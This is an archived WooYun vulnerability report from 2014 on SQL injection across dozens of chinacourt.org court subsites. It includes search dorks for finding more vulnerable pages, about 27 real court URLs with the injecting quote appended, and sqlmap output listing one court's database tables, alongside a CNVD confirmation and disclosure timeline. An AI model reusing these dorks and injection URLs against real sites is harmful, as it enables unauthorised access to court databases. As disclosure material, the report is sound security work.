当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051137

漏洞标题:中国法院网多个分站SQL注入

相关厂商:中国法院网

漏洞作者: U神

提交时间:2014-02-17 17:55

修复时间:2014-04-03 17:55

公开时间:2014-04-03 17:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-17: 细节已通知厂商并且等待厂商处理中
2014-02-22: 厂商已经确认,细节仅向厂商公开
2014-03-04: 细节向核心白帽子及相关领域专家公开
2014-03-14: 细节向普通白帽子公开
2014-03-24: 细节向实习白帽子公开
2014-04-03: 细节向公众公开

简要描述:

详细说明:

baidu or google:
inurl:more.php?LocationID=0302000000 也可以
inurl:more.php?LocationID=
http://zzzy.chinacourt.org/public/more.php?LocationID=0302000000%27 株洲市中级人民法院
http://dkxfy.chinacourt.org/fygl/more.php?LocationID=0302000000%27 洞口县法院网
http://ydxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 于都县人民法院
http://xyqfy.chinacourt.org/fygl/more.php?LocationID=0302000000%27 襄阳市人民法院
http://yzzy.chinacourt.org/gg/more.php?LocationID=0302000000%27 永州人民法院
http://jyqfy.chinacourt.org/fxyd/more.php?LocationID=0302000000%27 包头市九原区法院网
http://bjdxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 大兴法院网
http://hnsyzy.chinacourt.org/spdt/more.php?LocationID=0302000000%27 邵阳市中级人民法院
http://sxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 陕西法院网
http://hnhhzy.chinacourt.org/public/more.php?LocationID=0302000000%27 怀化中级人民法院网
http://nbzy.chinacourt.org/public/more.php?LocationID=0302000000%27 宁波法院网
http://gxfy.chinacourt.org/public/more.php?LocationID=0302000000%27 广西法院网
http://wsxfy.chinacourt.org/gzdt/more.php?LocationID=0302000000%27 山东省汶上县人民法院网
http://fcgzy.chinacourt.org/public/more.php?LocationID=0302000000%27 防城港市中级人民法院网
http://jxwnfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 江西省万年县人民法院
http://bjzy.chinacourt.org/public/more.php?LocationID=0302000000%27 宝鸡市中级人民法院网
http://lhzy.chinacourt.org/dwjs/more.php?LocationID=0302000000%27 河南省漯河市中级人民法院
http://jgsfy.chinacourt.org/fgfc/more.php?LocationID=0302000000%27 井冈山法院网
http://ncxhqfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 南昌西湖区法院网
http://jxwafy.chinacourt.org/public/more.php?LocationID=0302000000%27 万安县法院网
http://lnfy.chinacourt.org/fyxx/more.php?LocationID=0302000000%27 辽宁法院网
http://yjxfy.chinacourt.org/swgk/more.php?LocationID=0302000000%27 江西省余江县人民法院
http://ljfy.chinacourt.org/fyxw/more.php?LocationID=0302000000%27 山东省利津县人民法院
http://xwsfy.chinacourt.org/public/more.php?LocationID=0302000000%27 宣威市法院网
http://zzzy.chinacourt.org/public/more.php?p=1&LocationID=0302000000%27 株洲法院网
http://qhfy.chinacourt.org/sszn/more.php?LocationID=0302000000%27 青海法院网
........等等

漏洞证明:

就拿第一个来看看~
http://zzzy.chinacourt.org/public/more.php?LocationID=0302000000

00.jpg


01.jpg


02.jpg


03.jpg


Database: zzzy
[38 tables]
+--------------------------+
| AccountXML1 |
| CPG_config |
| EMAIL |
| Inhalt |
| LT_SERIE |
| TBLPROFILES |
| TBLREPORTS |
| last |
| add_irm |
| artikel |
| binn_articles_temps |
| binn_forum_posts |
| binn_imagelib_templ |
| bookings |
| cart_table |
| cmRepository |
| counter |
| cron_send |
| dw |
| glas |
| gruppi |
| hibernate_unique_key |
| not_null_test |
| oil_biolmed_entity_types |
| oil_messages |
| oil_messages_cfg |
| oil_templates_menu |
| politics |
| produtos |
| store2 |
| tblLogBookImport |
| tblNewCategory |
| tblOrders |
| tbl_useraccount |
| tbl_works |
| tblproduct |
| tblproducts |
| user_un |
+--------------------------+
[22:35:20] [INFO] fetched data log
qlmap\output\zzzy.chinacourt.org'
仅跑到字段,未深入,切勿跨省!谢谢合作!

修复方案:

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-02-22 11:51

厂商回复:

CNVD确认并复现所述多个实例情况,根据测试结果,按目录分可视为多个实例,按站点服务器分则只有两个实例。由CNVD通过公开联系渠道直接通报网站管理单位。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-02-17 17:57 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @疯狗 哎~通用型的走小厂商,@cncert国家互联网应急中心 求给危害度高~

  2. 2014-03-01 17:37 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @cncert国家互联网应急中心 你是如何联系那些单位的?公开渠道可给看看啊?